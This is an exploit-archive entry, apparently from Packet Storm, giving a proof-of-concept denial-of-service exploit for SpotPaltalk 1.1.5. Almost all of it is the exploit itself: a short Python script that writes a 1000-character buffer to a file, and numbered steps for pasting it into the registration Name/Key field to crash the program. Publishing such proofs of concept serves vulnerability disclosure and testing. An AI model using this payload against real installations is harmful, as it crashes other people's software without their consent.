SpotPaltalk 1.1.5 Denial Of Service

2019-05-10T00:00:00
ID PACKETSTORM:152798
Type packetstorm
Reporter Alejandra Sanchez
Modified 2019-05-10T00:00:00

Description

                                        
                                            `# -*- coding: utf-8 -*-  
# Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)  
# Date: 09/05/2019  
# Author: Alejandra Sánchez  
# Vendor Homepage: http://www.nsauditor.com  
# Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe  
# Version: 1.1.5  
# Tested on: Windows 10  
  
# Proof of Concept:  
# 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"  
# 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard  
# 3.- Open SpotPalTalk  
# 4. Select "Register" > "Enter Registration Code..."  
# 5.- Paste clipboard in the Name/Key field   
# 6.- Click 'OK'  
# 7.- Crashed  
  
buffer = "\x41" * 1000  
f = open ("SpotPaltalk.txt", "w")  
f.write(buffer)  
f.close()  
`